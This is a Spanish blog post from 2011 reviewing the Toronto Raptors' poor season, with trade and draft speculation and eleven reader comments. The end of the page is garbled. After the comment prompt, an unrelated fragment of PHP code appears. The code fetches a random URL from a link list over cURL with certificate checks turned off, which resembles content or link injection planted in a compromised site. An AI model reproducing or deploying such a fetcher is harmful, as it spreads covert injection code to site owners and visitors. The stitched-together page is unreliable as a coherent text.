Toronto Raptors: Muy deficiente

17 de June de 2011 por txusma

No había duda a principio de temporada y no las ha habido durante todo el año. La franquicia canadiense ha sido uno de los peores equipos de la NBA y ha superado por los pelos la barrera de los 22 victorias. Si el vacío que dejó Lebron James en Cleveland era de proporciones bíblicas, qué podemos decir del agujero que ha quedado en Toronto tras las marcha de Chris Bosh. Collangelo señaló con el dedo a Andrea Bargnani como su sustituto natural al firmarle una jugosísima renovación pero el italiano no ha acabado de dejarle en buen lugar. Ha anotado más puntos que nunca pero simplemente porque ha acaparado más balón aumentando el número de intentos de tiros de campo y tiros libres. Y, aunque parezca increíble, Bargnani ha sido capaz de rebotear y taponear menos que en cualquiera de sus temporadas anteriores. No puede liderar tu equipo un jugador de 2’13 m que apenas supera los 5 rebotes por partido. Cualquier comparación con Dirk Nowitzki suena a sacrilegio en estos momentos.

Andrea puede argumentar que sus compañeros Reggie Evans, Amir Johnson y Ed Davis se han peleado a muerte bajo los tableros y tiene razón. Amir Johnson ha cumplido aunque no tenemos claro si al nivel de su sueldo, Reggie Evans ha resultado ser una agradable sorpresa en los pocos partidos que ha jugado y Ed Davis se ha ganado el derecho a que pensemos que él sí puede hacer olvidar a Chris Bosh a largo plazo. Demar DeRozan, que ha dado un paso al frente como le pedían en Canadá, y Jose Calderon también han cuajado buenas temporadas e incluso la incorporación de Jarryd Bayless a mitad de temporada puede ser catalogada de buena noticia. En cambio, Barbosa ha estado muy irregular y Kleiza ha estado peleado con las lesiones todo el año.

Faltan piezas en Toronto pero el túnel no parece tan oscuro como en otros casos. Una elección número 5 del draft y una trade exception de 14 millones te hacen mirar todo de otra forma.

Lo mejor: El núcleo que tienen con Demar DeRozan y Ed Davis. El buen papel de secundarios como Reggie Evans o Amir Johnson. El  ‘retorno’ de Calderon tras una temporada pésima. La trade exception.

Lo peor: La confirmación de que Andrea Bargnani no puede liderar una franquicia de la NBA por si solo. Las lesiones de Linas Kleiza y Reggie Evans. La irregular actuación de Barbosa.

Jugando a GM:

Ofrecería la renovación a Reggie Evans pero por mucho menos de los 5 kilos que ha cobrado esta temporada. Ha cumplido con su papel y tiene mucha ascendencia en el vestuario.

– El mayor agujero de este equipo se encuentra en la posición de alero. Por eso intentaría hacer un esfuerzo para conseguir la 2ª elección del draft y así poder draftear a Derrick Williams y ponerlo a jugar en esa posición. De todas maneras se antoja muy complicado sin meter a DeRozan por el medio y tampoco veo tan claro que valga la pena.

– La elección número 5 dependería de los traspasos que tuviera en mente que pudiera cerrar. Mi objetivo sería traspasar los contratos de Andrea Bargnani y Jose Calderon. Si no puedo cerrar ninguno de los 2 podríamos draftear al checo Jan Vesely, a un alero más puro como Kawhi Leonard o un buen defensor interior como Biyombo. Otra opción sería la de retrodecer algún puesto y pescar lo que quede del grupo formado por Kanter, Knight, Walker, Valanciunas, Biyombo, Vesely o Leonard. De hecho, el jugador del Congo puede caer más allá del TOP-10.

– Me cuesta imaginar un destino para Bargnani… ¿Tal vez Minnesota y recibir a Beasley? ¿Atlanta? Lo que está claro es que ha de ser un equipo con un reboteador nato como Love o Horford y un buen juego defensivo de conjunto donde sus carencias no se vieran tan reflejadas.

– En el caso del español el problema es su salario porque a infinidad de equipos les gustaría tenerlo en sus filas. De hecho, le auguro un buen futuro en algún equipo campeón al estilo Jason Kidd, salvando las distancias. ¿Porqué no a los Lakers a cambio de Luke Walton, Shannon Brown y Debin Ebanks?

– Si traspasamos a Bargnani la elección número 5 ha de ser para Enes Kanter. La opción de Valanciunas me cuesta porque su curva de aprendizaje sería muy lenta y desconfío de este tipo de jugadores pero evidentemente habría que tenerlo en cuenta.

– Si se traspasa a Jose Calderon, podríamos draftear a Brandon Knight o Kemba Walker, aunque en el caso de Walker me parece un perfil demasiado parecido al de Jarryd Bayless.

– ¿Y que hacemos con la trade exception? ¿Alguien ha dicho Rudy Gay o Andre Iguodala? Con los Sixers el acuerdo es complicado porque buscan reforzar el equipo pero ya hemos visto como han jugado los Grizzlies sin Gay…

Comenta

11 comentarios a esta entrada

  1. CAMPO2 dice:
    #1

    Tengo comprometidos 45 millones para esta temporada con 11 jugadores, renuevo a Evans po r unos 3 millones.

    -le ofrezco a kirilenko la trade excepcion, con lo que conseguimos un alero que ayuda en el rebote y hace un poco de todo
    -Bargnani + alguna segunda ronda por Arenas, Bargnani en Orlando no tendria que defender a nadie estando Howard y tendria espacios para tirar de lejos, yo creo que se complementarian, Orlando se desaria del contrato de Arenas que para lo que cobra y el rendimiento que les ha dado es caro.
    -Con la llegada de Arenas me sobra Calderon que lo mando a Charlotte por Boris Diaw y Livingston (creo que mas o menos cuadraria). y los dos liberarian salario de cara al año que viene, De ahi el principal problema para que los suelte el gañan de Jordan.
    -En el Draft eligo a Enes Kanter

    Quinteto:
    Arenas , Derozan, Kirilenko, Ed Davis y Kanter
    Banquillo:
    Bayless, Barbosa, Diaw, Evans ,Johnson.

    Creo que todo cuadra

      Citar

  2. Txusma dice:
    #2

    La trade exception no funciona asi. Te sirve para igualar traspasos. Utah utilizó la trade exception que se generó en el sign and trade Boozer a los Bulls para fichar a Al Jefferson. No tuvo q enviar la misma cantidad de salario q cobraba Jefferon a Minnesota. En su lugar utilizó la trade exception.
    Yo es q no puedo con Arenas, lo siento. Casi prefiero quedarme con Bargnani. Y además creo q no cuadra pq Arenas cobra ¡17 kilos! y Bargani solo 10.

      Citar

  3. CAMPO2 dice:
    #3

    Entonces renuevo a wems , lo de kirilenko no lo hago y utilizo la trade con Bargnani para conseguir a Arenas.
    Diaw titular y weems y kleiza de suplentes, si Kleiza se recupera de lo que tenga

    Gracias Txusma por la aclaración de la trade

      Citar

  4. ralage dice:
    #4

    Lo de arenas me da una idea…

    http://games.espn.go.com/nba/tradeMachine?tradeId=3ot8scm

    Esto lo hago suponiendo que los Magic renuevan a JRich por al menos 7 M (para mi merecidos)

      Citar

  5. ralage dice:
    #5

    Y lo envían a Toronto ,aclaro

      Citar

  6. Blade Petrovic dice:
    #6

    Yo haría lo de CAMPO 2,txusma por cierto mira el correo

      Citar

  7. Txusma dice:
    #7

    Que correo, Blade? El que aparece cuando hago comentarios o el del blog? Si has enviado algo debería ser el del blog pq el otro ya ni lo utilizo.

      Citar

  8. Blade Petrovic dice:
    #8

      Citar

  9. Txusma dice:
    #9

    Pues debemos tener problemas con el correo pq no he recibido nada. Te he enviado un correo a la dirección de los comentarios.

      Citar

  10. Denise dice:
    #10

    Pero si Arenas ya se deja llevar en un equipo con aspiraciones al titulo como Orlando, en una banda como los Raptors no haría nada.
    Lo mejor que podrían hacer los Raptors es liberarse de Calderón, Barbosa, Bargnani y Kleiza, conseguir jugadores jóvenes a cambio, y estar un par de años pillando top 5 del Draft. No creo que ninguna estrella, ni siquiera ningun escudero que sea agente libre se le piense por la cabeza ir a Toronto.

      Citar

  11. TheDeerHunter dice:
    #11

    Un equipo que tiene a Bargnani como buque insignia no puede andar demasiado bien…

    Se comenta que Barbosa medita largarse a su país. Está barajando ofertas, además de estar dispuesto explorar su valor como agente libre. Sería cojonudo para los Raptors que no ejerciera la player option liberando esos 7 kilos. Alguna ventaja tiene que tener ser uno de los destinos deportivos menos atractivos del mundo ahora mismo.

    No me disgusta el eje Ed Davis, DeRozan junto a Amir Johnson e incluso Bayless por ahí. Creo que se debería poder hacer algo con Bargnani, Calderon e incluso Kleiza.
    Antes habéis mencionado un posible traspaso con Orlando. En la línea de lo que hablábamos Bargnani podría ser un buen complemento de Howard y no quiero decir nada de Calderon. Pongamos un Nelson+Redick por ellos dos incluyendo la trade exception de Lewis para cuadrar podría ser muy interesante para ambos equipos.

    La idea podría ser algo así:
    – Nelson, Bayless
    – DeRozan, Reddick
    – Kleiza, Vesely (?)
    – Davis, Evans
    – Johnson, Kanter (?)

    Lógicamente la historia es reforzar la 3 o la 5 según lo que tengas previsto reforzar por otras vías. Sería un equipo apañadete para intentar cazar la 8ª del Este y algo más flexible salarialmente de lo que había.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>